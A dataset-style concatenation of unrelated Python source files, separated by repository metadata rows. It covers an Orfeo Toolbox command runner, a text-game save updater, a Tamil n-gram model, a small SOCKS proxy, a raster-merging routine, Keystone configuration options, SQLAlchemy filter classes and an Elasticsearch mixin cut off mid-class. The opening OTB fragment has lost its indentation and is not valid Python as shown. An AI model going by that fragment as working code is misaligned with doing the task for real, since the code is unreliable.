@staticmethod
def executeOtb(commands, progress):
loglines = []
loglines.append("OTB execution console output")
os.putenv('ITK_AUTOLOAD_PATH', OTBUtils.otbLibPath())
fused_command = ''.join(['"%s" ' % c for c in commands])
proc = subprocess.Popen(fused_command, shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE,stderr=subprocess.STDOUT, universal_newlines=True).stdout
for line in iter(proc.readline, ""):
if "[*" in line:
idx = line.find("[*")
perc = int(line[idx-4:idx-2].strip(" "))
if perc !=0:
progress.setPercentage(perc)
else:
loglines.append(line)
progress.setConsoleInfo(line)
SextanteLog.addToLog(SextanteLog.LOG_INFO, loglines)
| gpl-2.0 | 8,866,819,792,905,386,000 | 38.830769 | 162 | 0.526844 | false | 4.265239 | true | false | false |
huntermalm/SevenStories | SevenStories/updator.py | 1 | 1128 | def update(game_map):
"""Updated the game_map depending on version
:param game_map: The currently loaded GameMap object
:type game_map: class GameMap
:return: True/False depending on if any updates occurred
:rtype: boolean
"""
updated = False
if game_map.version == "0.1.1":
import locations
updated = True
game_map.locations = []
game_map.locations.append(locations.Location("First room"))
game_map.player.location = game_map.locations[0]
game_map.version = "0.2.0"
if game_map.version == "0.2.0":
import locations
first_room = game_map.locations[0]
del game_map.locations
game_map.locations = {}
game_map.locations["first room"] = first_room
game_map.locations["second room"] = locations.Location("Second room")
game_map.locations["first room"].available_locations["second room"] = game_map.locations["second room"]
game_map.locations["second room"].available_locations["first room"] = game_map.locations["first room"]
game_map.version = "0.3.0"
return updated
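# Typical call site (sketch; `load_game` and `save_game` stand in for the
# game's actual save-handling helpers):
#   game_map = load_game(save_path)
#   if update(game_map):
#       save_game(game_map)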
| mit | -5,038,023,386,771,104,000 | 35.387097 | 111 | 0.638298 | false | 3.876289 | false | false | false |
tuxnani/open-telugu | ngram/LetterModels.py | 3 | 1883 |
# -*- coding: utf-8 -*-
#
# (C) முத்தையா அண்ணாமலை 2013-2015
#
# N-gram language model for Tamil letters
import tamil
import copy
from .Corpus import Corpus
class Letters:
def __init__(self,filename):
self.letter = dict()
self.letter.update(zip( tamil.utf8.tamil_letters,
map(lambda x : 0, tamil.utf8.tamil_letters) ) )
self.corpus = Corpus( filename )
def __del__(self):
try:
del self.corpus
except Exception:
pass
def __unicode__( self ):
op = u""
for lett,freq in self.letter.items():
op = op + u"%s => %d\n"%(lett,freq)
print(max(self.letter.values()))
return op
class Unigram(Letters):
def frequency_model( self ):
""" build a letter frequency model for Tamil letters from a corpus """
# use a generator in corpus
for next_letter in self.corpus.next_tamil_letter():
# update frequency from corpus
self.letter[next_letter] = self.letter[next_letter] + 1
class Bigram(Unigram):
def __init__(self,filename):
Unigram.__init__(self,filename)
self.letter2 = dict()
for k in tamil.utf8.tamil_letters:
self.letter2[k] = copy.copy( self.letter )
def language_model(self,verbose=True):
""" builds a Tamil bigram letter model """
# use a generator in corpus
prev = None
for next_letter in self.corpus.next_tamil_letter():
# update frequency from corpus
if prev:
self.letter2[prev][next_letter] += 1
if ( verbose ) :
print(prev)
print(next_letter)
print( self.letter2[prev][next_letter] )
prev = next_letter #update always
return
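# Minimal usage sketch (the corpus file name is a placeholder):
#   uni = Unigram(u'tamil_corpus.txt')
#   uni.frequency_model()
#   print(unicode(uni))
#   bi = Bigram(u'tamil_corpus.txt')
#   bi.language_model(verbose=False)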
| mit | 2,368,099,136,509,108,000 | 28.380952 | 79 | 0.548352 | false | 3.539197 | false | false | false |
LuoZijun/python-proxy | proxy/__init__.py | 1 | 3560 | #!/usr/bin/env python
#-*- coding:utf-8 -*-
import os, sys, time
import socket, struct, select
import thread, logging
import protocols
reload(sys)
sys.setdefaultencoding('utf8')
logging.basicConfig(
# filename ='proxy.log',
format = '%(asctime)s %(message)s',
datefmt = '%Y-%m-%d %H:%M:%S',
level = logging.DEBUG
)
class Session:
def __init__(self, session=None, host="", port=0 ):
self.session = session
self.host = host
self.port = port
def begin(self):
try:
self.start()
except socket.timeout:
logging.info('[Session] Session %s:%d timeout.' % (self.host, self.port) )
except (KeyboardInterrupt, SystemExit):
self.close()
raise KeyboardInterrupt
finally:
try:
self.close()
except Exception as e:
logging.debug(e)
def start(self):
buff, protocol = protocols.guess_protocol(self.session)
if protocol == "socks":
logging.info('[Session] protocol is Socks')
handle = protocols.socks.Socks(buff=buff, session=self.session)
handle.handle()
self.close()
elif protocol == "http":
logging.info('[Session] protocol is Http')
# handle = protocols.http.Http(buff=buff, session=self.session)
self.close()
elif protocol == "ftp":
# handle = protocols.ftp.Ftp(buff=buff, session=self.session)
logging.info('[Session] unsupport protocol ')
self.close()
elif protocol == "ssl":
# handle = protocols.ssl.Ssl(buff=buff, session=self.session)
logging.info('[Session] unsupport protocol ')
self.close()
else:
logging.info('[Session] unknow protocol ')
self.close()
def close(self):
logging.info('[Session] Session %s:%d close.' % (self.host, self.port) )
return self.session.close()
class Proxy:
def __init__(self, host="0.0.0.0", port=1070):
self.host = host
self.port = port
def run(self):
try:
self.server = socket.socket()
self.server.bind((self.host, self.port))
self.server.listen(100)
except Exception as e:
logging.debug("[Server] Can not make proxy server on %s:%d " %(self.host, self.port) )
logging.debug(e)
return self.shutdown()
logging.info("[Server] Proxy Server running on %s:%d ..." %(self.host, self.port))
# run forever
try:
self.loop()
except (KeyboardInterrupt, SystemExit):
pass
except Exception as e:
logging.info('[Server] Unknow error ...')
logging.info(e)
finally:
self.shutdown()
def shutdown(self):
logging.info('[Server] Shutdown Proxy server ...')
return self.server.close()
def loop(self):
while True:
connection, address = self.server.accept()
session = Session(session=connection, host=address[0], port=address[1])
try:
thread.start_new_thread(session.start, () )
except Exception as e:
logging.debug("[Server] 会话异常...")
logging.info(e)
session.close()
if __name__ == '__main__':
host = "0.0.0.0"
port = 1070
proxy = Proxy(host=host, port=port)
proxy.run()
| gpl-3.0 | -8,861,070,895,592,761,000 | 28.355372 | 98 | 0.538851 | false | 4.054795 | false | false | false |
JoaquimPatriarca/senpy-for-gis | gasp/osm2lulc/combine.py | 1 | 7837 | """
Methods to update/combine authoritative Land Use/Land Cover Information
with OSM Data
"""
def update_globe_land_cover(
original_globe_raster, osm_urban_atlas_raster, osm_globe_raster, epsg,
updated_globe_raster, detailed_globe_raster):
"""
    Update the original Globe Land 30 with the result of the conversion of
    OSM data to the Globe Land Cover nomenclature;
    also updates the previously updated Globe Land 30 with the result of the
    conversion of OSM data to the Urban Atlas nomenclature.
"""
import os
import numpy as np
from gasp.torst.gdal import array_to_raster
from gasp.fromrst.gdal import rst_to_array
from gasp.gdal.properties.cells import get_cellsize
    from gasp.gdal.properties.cells import get_nodata
    from osgeo import gdal
# ############################# #
# Convert images to numpy array #
# ############################# #
np_globe_original = rst_to_array(original_globe_raster)
np_globe_osm = rst_to_array(osm_globe_raster)
np_ua_osm = rst_to_array(osm_urban_atlas_raster)
# ################################## #
# Check the dimension of both images #
# ################################## #
if np_globe_original.shape != np_globe_osm.shape:
return (
'The Globe Land 30 raster (original) do not have the same number'
' of columns/lines comparing with the Globe Land 30 derived '
'from OSM data'
)
elif np_globe_original.shape != np_ua_osm.shape:
return (
'The Globe Land 30 raster (original) do not have the same '
'number of columns/lines comparing with the Urban Atlas raster '
'derived from OSM data'
)
elif np_globe_osm.shape != np_ua_osm.shape:
return (
'The Globe Land 30 derived from OSM data do not have the same '
'number of columns/lines comparing with the Urban Atlas raster '
'derived from OSM data'
)
# ############## #
# Check Cellsize #
# ############## #
cell_of_rsts = get_cellsize(
[original_globe_raster, osm_globe_raster, osm_urban_atlas_raster],
xy=True
)
cell_globe_original = cell_of_rsts[original_globe_raster]
cell_globe_osm = cell_of_rsts[osm_globe_raster]
cell_ua_osm = cell_of_rsts[osm_urban_atlas_raster]
if cell_globe_original != cell_globe_osm:
return (
'The cellsize of the Globe Land 30 raster (original) is not the '
'same comparing with the Globe Land 30 derived from OSM data'
)
elif cell_globe_original != cell_ua_osm:
return (
'The cellsize of the Globe Land 30 raster (original) is not the '
'same comparing with the Urban Atlas raster derived from OSM data'
)
elif cell_ua_osm != cell_globe_osm:
return (
'The cellsize of the Globe Land 30 derived from OSM data is not '
'the same comparing with the Urban Atlas raster derived from '
'OSM data'
)
# ############################# #
# Get the Value of Nodata Cells #
# ############################# #
nodata_glob_original = get_nodata(original_globe_raster)
nodata_glob_osm = get_nodata(osm_globe_raster)
nodata_ua_osm = get_nodata(osm_urban_atlas_raster)
# ######################################## #
# Create a new map - Globe Land 30 Updated #
# ######################################## #
"""
Create a new array with zeros...
1) The zeros will be replaced by the values in the Globe Land derived from
OSM.
2) The zeros will be replaced by the values in the Original Globe Land at
the cells with NULL data in the Globe Land derived from OSM.
    The meta array identifies the origin of each value in the updated raster:
    1 - Original Raster
2 - OSM Derived Raster
"""
update_array = np.zeros((
np_globe_original.shape[0], np_globe_original.shape[1]))
update_meta_array = np.zeros((
np_globe_original.shape[0], np_globe_original.shape[1]))
# 1)
np.copyto(update_array, np_globe_osm, 'no', np_globe_osm != nodata_glob_osm)
# 1) meta
np.place(update_meta_array, update_array != 0, 2)
# 2) meta
np.place(update_meta_array, update_array == 0, 1)
# 2)
np.copyto(update_array, np_globe_original, 'no', update_array == 0)
# 2) meta
np.place(
update_meta_array,
update_array==nodata_glob_original, int(nodata_glob_original)
)
# noData to int
np.place(
update_array, update_array==nodata_glob_original,
int(nodata_glob_original)
)
updated_meta = os.path.join(
os.path.dirname(updated_globe_raster),
'{n}_meta{e}'.format(
n = os.path.splitext(os.path.basename(updated_globe_raster))[0],
e = os.path.splitext(os.path.basename(updated_globe_raster))[1]
)
)
# Create Updated Globe Cover 30
array_to_raster(
update_array, updated_globe_raster, original_globe_raster, epsg,
gdal.GDT_Int32, noData=int(nodata_glob_original)
)
# Create Updated Globe Cover 30 meta
array_to_raster(
update_meta_array, updated_meta, original_globe_raster, epsg,
gdal.GDT_Int32, noData=int(nodata_glob_original)
)
# ################################################# #
# Create a new map - Globe Land 30 Detailed with UA #
# ################################################# #
np_update = rst_to_array(updated_globe_raster)
detailed_array = np.zeros((np_update.shape[0], np_update.shape[1]))
detailed_meta_array = np.zeros((
np_update.shape[0], np_update.shape[1]
))
"""
    Replace Globe Land class 80 with Urban Atlas classes 11, 12, 13 and 14.
    The meta array identifies the origin of each value in the detailed raster:
1 - Updated Raster
2 - UA Derived Raster from OSM
"""
    # Globe - Maintain some classes
    np.place(detailed_array, np_update==30, 8)
    np.place(detailed_meta_array, np_update==30, 1)
    np.place(detailed_array, np_update==40, 9)
    np.place(detailed_meta_array, np_update==40, 1)
    np.place(detailed_array, np_update==50, 10)
    np.place(detailed_meta_array, np_update==50, 1)
    np.place(detailed_array, np_update==10, 5)
    np.place(detailed_meta_array, np_update==10, 1)
# Water bodies
    np.place(detailed_array, np.logical_or(np_ua_osm==50, np_update==60), 7)
    np.place(detailed_meta_array, np.logical_or(np_ua_osm==50, np_update==60), 1)
# Urban - Where Urban Atlas IS NOT NULL
np.place(detailed_array, np_ua_osm==11, 1)
np.place(detailed_meta_array, np_ua_osm==11, 2)
np.place(detailed_array, np_ua_osm==12, 2)
np.place(detailed_meta_array, np_ua_osm==12, 2)
np.place(detailed_array, np_ua_osm==13, 3)
np.place(detailed_meta_array, np_ua_osm==13, 2)
np.place(detailed_array, np_ua_osm==14, 4)
np.place(detailed_meta_array, np_ua_osm==14, 2)
# Urban Atlas - Class 30 to 6
np.place(detailed_array, np_ua_osm==30, 6)
np.place(detailed_meta_array, np_ua_osm==30, 2)
# Create Detailed Globe Cover 30
array_to_raster(
detailed_array, detailed_globe_raster, original_globe_raster, epsg,
gdal.GDT_Int32, noData=0
)
# Create Detailed Globe Cover 30 meta
detailed_meta = os.path.join(
os.path.dirname(detailed_globe_raster),
'{n}_meta{e}'.format(
            n = os.path.splitext(os.path.basename(detailed_globe_raster))[0],
            e = os.path.splitext(os.path.basename(detailed_globe_raster))[1]
)
)
array_to_raster(
detailed_meta_array, detailed_meta, original_globe_raster, epsg,
gdal.GDT_Int32, noData=0
)
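# Example invocation (sketch only -- every path below is a placeholder, the
# three input rasters must share extent, cell size and alignment as checked
# above, and the EPSG code is likewise just an example):
#   update_globe_land_cover(
#       '/data/globe30_original.tif', '/data/osm_as_urban_atlas.tif',
#       '/data/osm_as_globe30.tif', 3763,
#       '/data/globe30_updated.tif', '/data/globe30_detailed.tif'
#   )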
| gpl-3.0 | 5,554,260,234,809,204,000 | 33.986607 | 80 | 0.584662 | false | 3.389706 | false | false | false |
dsiddharth/access-keys | keystone/common/config.py | 1 | 14051 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
_DEFAULT_AUTH_METHODS = ['external', 'password', 'token']
FILE_OPTIONS = {
'': [
cfg.StrOpt('admin_token', secret=True, default='ADMIN'),
cfg.StrOpt('public_bind_host',
default='0.0.0.0',
deprecated_opts=[cfg.DeprecatedOpt('bind_host',
group='DEFAULT')]),
cfg.StrOpt('admin_bind_host',
default='0.0.0.0',
deprecated_opts=[cfg.DeprecatedOpt('bind_host',
group='DEFAULT')]),
cfg.IntOpt('compute_port', default=8774),
cfg.IntOpt('admin_port', default=35357),
cfg.IntOpt('public_port', default=5000),
cfg.StrOpt('public_endpoint',
default='http://localhost:%(public_port)s/'),
cfg.StrOpt('admin_endpoint',
default='http://localhost:%(admin_port)s/'),
cfg.StrOpt('onready'),
# default max request size is 112k
cfg.IntOpt('max_request_body_size', default=114688),
cfg.IntOpt('max_param_size', default=64),
# we allow tokens to be a bit larger to accommodate PKI
cfg.IntOpt('max_token_size', default=8192),
cfg.StrOpt('member_role_id',
default='9fe2ff9ee4384b1894a90878d3e92bab'),
cfg.StrOpt('member_role_name', default='_member_'),
cfg.IntOpt('crypt_strength', default=40000)],
'identity': [
cfg.StrOpt('default_domain_id', default='default'),
cfg.BoolOpt('domain_specific_drivers_enabled',
default=False),
cfg.StrOpt('domain_config_dir',
default='/etc/keystone/domains'),
cfg.StrOpt('driver',
default=('keystone.identity.backends'
'.sql.Identity')),
cfg.IntOpt('max_password_length', default=4096)],
'trust': [
cfg.BoolOpt('enabled', default=True),
cfg.StrOpt('driver',
default='keystone.trust.backends.sql.Trust')],
'os_inherit': [
cfg.BoolOpt('enabled', default=False)],
'token': [
cfg.ListOpt('bind', default=[]),
cfg.StrOpt('enforce_token_bind', default='permissive'),
cfg.IntOpt('expiration', default=3600),
cfg.StrOpt('provider', default=None),
cfg.StrOpt('driver',
default='keystone.token.backends.sql.Token'),
cfg.BoolOpt('caching', default=True),
cfg.IntOpt('revocation_cache_time', default=3600),
cfg.IntOpt('cache_time', default=None)],
'cache': [
cfg.StrOpt('config_prefix', default='cache.keystone'),
cfg.IntOpt('expiration_time', default=600),
# NOTE(morganfainberg): the dogpile.cache.memory acceptable in devstack
# and other such single-process/thread deployments. Running
# dogpile.cache.memory in any other configuration has the same pitfalls
# as the KVS token backend. It is recommended that either Redis or
# Memcached are used as the dogpile backend for real workloads. To
# prevent issues with the memory cache ending up in "production"
# unintentionally, we register a no-op as the keystone default caching
# backend.
cfg.StrOpt('backend', default='keystone.common.cache.noop'),
cfg.BoolOpt('use_key_mangler', default=True),
cfg.MultiStrOpt('backend_argument', default=[]),
cfg.ListOpt('proxies', default=[]),
# Global toggle for all caching using the should_cache_fn mechanism.
cfg.BoolOpt('enabled', default=False),
# caching backend specific debugging.
cfg.BoolOpt('debug_cache_backend', default=False)],
'ssl': [
cfg.BoolOpt('enable', default=False),
cfg.StrOpt('certfile',
default="/etc/keystone/ssl/certs/keystone.pem"),
cfg.StrOpt('keyfile',
default="/etc/keystone/ssl/private/keystonekey.pem"),
cfg.StrOpt('ca_certs',
default="/etc/keystone/ssl/certs/ca.pem"),
cfg.StrOpt('ca_key',
default="/etc/keystone/ssl/private/cakey.pem"),
cfg.BoolOpt('cert_required', default=False),
cfg.IntOpt('key_size', default=1024),
cfg.IntOpt('valid_days', default=3650),
cfg.StrOpt('cert_subject',
default='/C=US/ST=Unset/L=Unset/O=Unset/CN=localhost')],
'signing': [
cfg.StrOpt('token_format', default=None),
cfg.StrOpt('certfile',
default="/etc/keystone/ssl/certs/signing_cert.pem"),
cfg.StrOpt('keyfile',
default="/etc/keystone/ssl/private/signing_key.pem"),
cfg.StrOpt('ca_certs',
default="/etc/keystone/ssl/certs/ca.pem"),
cfg.StrOpt('ca_key',
default="/etc/keystone/ssl/private/cakey.pem"),
cfg.IntOpt('key_size', default=2048),
cfg.IntOpt('valid_days', default=3650),
cfg.StrOpt('cert_subject',
default=('/C=US/ST=Unset/L=Unset/O=Unset/'
'CN=www.example.com'))],
'assignment': [
# assignment has no default for backward compatibility reasons.
# If assignment driver is not specified, the identity driver chooses
# the backend
cfg.StrOpt('driver', default=None),
cfg.BoolOpt('caching', default=True),
cfg.IntOpt('cache_time', default=None)],
'credential': [
cfg.StrOpt('driver',
default=('keystone.credential.backends'
'.sql.Credential'))],
'oauth1': [
cfg.StrOpt('driver',
default='keystone.contrib.oauth1.backends.sql.OAuth1'),
cfg.IntOpt('request_token_duration', default=28800),
cfg.IntOpt('access_token_duration', default=86400)],
'federation': [
cfg.StrOpt('driver',
default='keystone.contrib.federation.'
'backends.sql.Federation')],
'policy': [
cfg.StrOpt('driver',
default='keystone.policy.backends.sql.Policy')],
'ec2': [
cfg.StrOpt('driver',
default='keystone.contrib.ec2.backends.kvs.Ec2')],
'endpoint_filter': [
cfg.StrOpt('driver',
default='keystone.contrib.endpoint_filter.backends'
'.sql.EndpointFilter'),
cfg.BoolOpt('return_all_endpoints_if_no_filter', default=True)],
'stats': [
cfg.StrOpt('driver',
default=('keystone.contrib.stats.backends'
'.kvs.Stats'))],
'ldap': [
cfg.StrOpt('url', default='ldap://localhost'),
cfg.StrOpt('user', default=None),
cfg.StrOpt('password', secret=True, default=None),
cfg.StrOpt('suffix', default='cn=example,cn=com'),
cfg.BoolOpt('use_dumb_member', default=False),
cfg.StrOpt('dumb_member', default='cn=dumb,dc=nonexistent'),
cfg.BoolOpt('allow_subtree_delete', default=False),
cfg.StrOpt('query_scope', default='one'),
cfg.IntOpt('page_size', default=0),
cfg.StrOpt('alias_dereferencing', default='default'),
cfg.StrOpt('user_tree_dn', default=None),
cfg.StrOpt('user_filter', default=None),
cfg.StrOpt('user_objectclass', default='inetOrgPerson'),
cfg.StrOpt('user_id_attribute', default='cn'),
cfg.StrOpt('user_name_attribute', default='sn'),
cfg.StrOpt('user_mail_attribute', default='email'),
cfg.StrOpt('user_pass_attribute', default='userPassword'),
cfg.StrOpt('user_enabled_attribute', default='enabled'),
cfg.IntOpt('user_enabled_mask', default=0),
cfg.StrOpt('user_enabled_default', default='True'),
cfg.ListOpt('user_attribute_ignore',
default=['default_project_id', 'tenants']),
cfg.StrOpt('user_default_project_id_attribute', default=None),
cfg.BoolOpt('user_allow_create', default=True),
cfg.BoolOpt('user_allow_update', default=True),
cfg.BoolOpt('user_allow_delete', default=True),
cfg.BoolOpt('user_enabled_emulation', default=False),
cfg.StrOpt('user_enabled_emulation_dn', default=None),
cfg.ListOpt('user_additional_attribute_mapping',
default=[]),
cfg.StrOpt('tenant_tree_dn', default=None),
cfg.StrOpt('tenant_filter', default=None),
cfg.StrOpt('tenant_objectclass', default='groupOfNames'),
cfg.StrOpt('tenant_id_attribute', default='cn'),
cfg.StrOpt('tenant_member_attribute', default='member'),
cfg.StrOpt('tenant_name_attribute', default='ou'),
cfg.StrOpt('tenant_desc_attribute', default='description'),
cfg.StrOpt('tenant_enabled_attribute', default='enabled'),
cfg.StrOpt('tenant_domain_id_attribute',
default='businessCategory'),
cfg.ListOpt('tenant_attribute_ignore', default=[]),
cfg.BoolOpt('tenant_allow_create', default=True),
cfg.BoolOpt('tenant_allow_update', default=True),
cfg.BoolOpt('tenant_allow_delete', default=True),
cfg.BoolOpt('tenant_enabled_emulation', default=False),
cfg.StrOpt('tenant_enabled_emulation_dn', default=None),
cfg.ListOpt('tenant_additional_attribute_mapping',
default=[]),
cfg.StrOpt('role_tree_dn', default=None),
cfg.StrOpt('role_filter', default=None),
cfg.StrOpt('role_objectclass', default='organizationalRole'),
cfg.StrOpt('role_id_attribute', default='cn'),
cfg.StrOpt('role_name_attribute', default='ou'),
cfg.StrOpt('role_member_attribute', default='roleOccupant'),
cfg.ListOpt('role_attribute_ignore', default=[]),
cfg.BoolOpt('role_allow_create', default=True),
cfg.BoolOpt('role_allow_update', default=True),
cfg.BoolOpt('role_allow_delete', default=True),
cfg.ListOpt('role_additional_attribute_mapping',
default=[]),
cfg.StrOpt('group_tree_dn', default=None),
cfg.StrOpt('group_filter', default=None),
cfg.StrOpt('group_objectclass', default='groupOfNames'),
cfg.StrOpt('group_id_attribute', default='cn'),
cfg.StrOpt('group_name_attribute', default='ou'),
cfg.StrOpt('group_member_attribute', default='member'),
cfg.StrOpt('group_desc_attribute', default='description'),
cfg.ListOpt('group_attribute_ignore', default=[]),
cfg.BoolOpt('group_allow_create', default=True),
cfg.BoolOpt('group_allow_update', default=True),
cfg.BoolOpt('group_allow_delete', default=True),
cfg.ListOpt('group_additional_attribute_mapping',
default=[]),
cfg.StrOpt('tls_cacertfile', default=None),
cfg.StrOpt('tls_cacertdir', default=None),
cfg.BoolOpt('use_tls', default=False),
cfg.StrOpt('tls_req_cert', default='demand')],
'pam': [
cfg.StrOpt('userid', default=None),
cfg.StrOpt('password', default=None)],
'auth': [
cfg.ListOpt('methods', default=_DEFAULT_AUTH_METHODS),
cfg.StrOpt('password',
default='keystone.auth.plugins.password.Password'),
cfg.StrOpt('token',
default='keystone.auth.plugins.token.Token'),
#deals with REMOTE_USER authentication
cfg.StrOpt('external',
default='keystone.auth.plugins.external.DefaultDomain')],
'paste_deploy': [
cfg.StrOpt('config_file', default=None)],
'memcache': [
cfg.ListOpt('servers', default=['localhost:11211']),
cfg.IntOpt('max_compare_and_set_retry', default=16)],
'catalog': [
cfg.StrOpt('template_file',
default='default_catalog.templates'),
cfg.StrOpt('driver',
default='keystone.catalog.backends.sql.Catalog')],
'kvs': [
cfg.ListOpt('backends', default=[]),
cfg.StrOpt('config_prefix', default='keystone.kvs'),
cfg.BoolOpt('enable_key_mangler', default=True),
cfg.IntOpt('default_lock_timeout', default=5)]}
CONF = cfg.CONF
def setup_authentication(conf=None):
# register any non-default auth methods here (used by extensions, etc)
if conf is None:
conf = CONF
for method_name in conf.auth.methods:
if method_name not in _DEFAULT_AUTH_METHODS:
conf.register_opt(cfg.StrOpt(method_name), group='auth')
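# Example: with a hypothetical keystone.conf that enables a non-default method,
#   [auth]
#   methods = external,password,token,oauth1
#   oauth1 = keystone.auth.plugins.oauth1.OAuth
# the loop above registers a StrOpt named `oauth1` under the [auth] group so
# the plugin path can be read from configuration (the path shown is only
# illustrative).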
def configure(conf=None):
if conf is None:
conf = CONF
conf.register_cli_opt(
cfg.BoolOpt('standard-threads', default=False,
help='Do not monkey-patch threading system modules.'))
conf.register_cli_opt(
cfg.StrOpt('pydev-debug-host', default=None,
help='Host to connect to for remote debugger.'))
conf.register_cli_opt(
cfg.IntOpt('pydev-debug-port', default=None,
help='Port to connect to for remote debugger.'))
for section in FILE_OPTIONS:
for option in FILE_OPTIONS[section]:
if section:
conf.register_opt(option, group=section)
else:
conf.register_opt(option)
# register any non-default auth methods here (used by extensions, etc)
setup_authentication(conf)
| apache-2.0 | 7,931,056,553,063,509,000 | 44.472492 | 79 | 0.597822 | false | 4.048113 | true | false | false |
rcosnita/fantastico | fantastico/mvc/models/model_filter_compound.py | 1 | 5048 | '''
Copyright 2013 Cosnita Radu Viorel
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
.. codeauthor:: Radu Viorel Cosnita <[email protected]>
.. py:module:fantastico.mvc.models.model_filter_compound
'''
from fantastico.exceptions import FantasticoNotSupportedError, FantasticoError
from fantastico.mvc.models.model_filter import ModelFilterAbstract
from sqlalchemy.sql.expression import and_, or_
class ModelFilterCompound(ModelFilterAbstract):
'''This class provides the api for compounding ModelFilter objects into a specified sql alchemy operation.'''
@property
def model_filters(self):
'''This property returns all ModelFilter instances being compound.'''
return self._model_filters
def __init__(self, operation, *args):
if len(args) < 2:
raise FantasticoNotSupportedError("Compound filter takes at least 2 simple model filters.")
for arg in args:
if not isinstance(arg, ModelFilterAbstract):
raise FantasticoNotSupportedError("ModelFilterAnd accept only arguments of type ModelFilter.")
self._operation = operation
self._model_filters = args
def build(self, query):
'''This method transform the current compound statement into an sql alchemy filter.'''
try:
for model_filter in self._model_filters:
# pylint: disable=W0212
if hasattr(query, "_primary_entity") and model_filter.column.table != query._primary_entity.selectable \
and hasattr(query, "_joinpoint") and not (model_filter.column.table in query._joinpoint.values()):
query = query.join(model_filter.column.table)
return query.filter(self.get_expression())
except Exception as ex:
raise FantasticoError(ex)
def get_expression(self):
'''This method transforms calculates sqlalchemy expression held by this filter.'''
return self._operation(*[model_filter.get_expression() for model_filter in self._model_filters])
def __eq__(self, obj):
'''This method is overriden in order to correctly evaluate equality of two compound model filters.'''
if type(self) != type(obj):
return False
if len(obj.model_filters) != len(self.model_filters):
return False
for idx in range(0, len(self.model_filters)):
if self.model_filters[idx] != obj.model_filters[idx]:
return False
return True
def __hash__(self):
'''This method generates a hash code for compound model filters.'''
result = hash(self.model_filters[0])
for idx in range(1, len(self.model_filters)):
result ^= hash(self.model_filters[idx])
return result
class ModelFilterAnd(ModelFilterCompound):
'''This class provides a compound filter that allows **and** conditions against models. Below you can find a simple example:
.. code-block:: python
id_gt_filter = ModelFilter(PersonModel.id, 1, ModelFilter.GT)
id_lt_filter = ModelFilter(PersonModel.id, 5, ModelFilter.LT)
name_like_filter = ModelFilter(PersonModel.name, '%%john%%', ModelFilter.LIKE)
complex_condition = ModelFilterAnd(id_gt_filter, id_lt_filter, name_like_filter)
'''
def __init__(self, *args):
super(ModelFilterAnd, self).__init__(and_, *args)
class ModelFilterOr(ModelFilterCompound):
'''This class provides a compound filter that allows **or** conditions against models. Below you can find a simple example:
.. code-block:: python
id_gt_filter = ModelFilter(PersonModel.id, 1, ModelFilter.GT)
id_lt_filter = ModelFilter(PersonModel.id, 5, ModelFilter.LT)
name_like_filter = ModelFilter(PersonModel.name, '%%john%%', ModelFilter.LIKE)
complex_condition = ModelFilterOr(id_gt_filter, id_lt_filter, name_like_filter)
'''
def __init__(self, *args):
super(ModelFilterOr, self).__init__(or_, *args)
| mit | 3,021,974,887,476,876,300 | 42.895652 | 128 | 0.684826 | false | 4.267117 | false | false | false |
mcieslik-mctp/papy | doc/examples/buffer.py | 1 | 1113 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from numap import NuMap
from time import sleep
def printer(element):
print element
return element
LEFT_INPUT = ('L0', 'L1', 'L2', 'L3')
RIGHT_INPUT = ('R0', 'R1', 'R2', 'R3')
# LEFT_INPUT RIGHT_INPUT
# | |
# |(printer) |(printer)
# | |
# left_iter right_iter
numap = NuMap(stride=2, buffer=6)
left_iter = numap.add_task(printer, LEFT_INPUT)
right_iter = numap.add_task(printer, RIGHT_INPUT)
# BUFFER 6 6 ...
# ---------------------- ------
# STRIDES 2 2 2 2
# ------ ------ ------ ------
# order of input L0, L1, R0, R1, L2, L3, R2, R3
print "first 6:"
numap.start()
sleep(1)
# should print:
# L0, L1, R0, R1, L2, L3
print "last 2:"
L0 = left_iter.next()
L1 = left_iter.next()
# should print:
# R2, R3
R0 = right_iter.next()
R1 = right_iter.next()
L2 = left_iter.next()
L3 = left_iter.next()
R2 = right_iter.next()
R3 = right_iter.next()
assert (L0, L1, L2, L3) == LEFT_INPUT
assert (R0, R1, R2, R3) == RIGHT_INPUT
| mit | 4,727,368,988,170,081,000 | 19.611111 | 49 | 0.515723 | false | 2.576389 | false | false | false |
lavalamp-/ws-backend-community | rest/views/elasticsearch/models/mixin.py | 1 | 25755 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import logging
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.http import Http404
from django.shortcuts import get_object_or_404
from rest_framework.settings import api_settings
from ..mixin import BaseElasticsearchAPIViewMixin
from lib import ValidationHelper, ConfigManager, get_export_type_wrapper_map
from rest.lib import PaginationSerializer
from .exception import TooManyEsResultsError
config = ConfigManager.instance()
logger = logging.getLogger(__name__)
class BaseElasticsearchMappedAPIViewMixin(BaseElasticsearchAPIViewMixin):
"""
This is a base mixin for all Elasticsearch APIView classes that query Elasticsearch models which are
mapped to database model instances.
"""
# Class Members
_db_object = None
_filter_by_parent_db_object = True
# Instantiation
# Static Methods
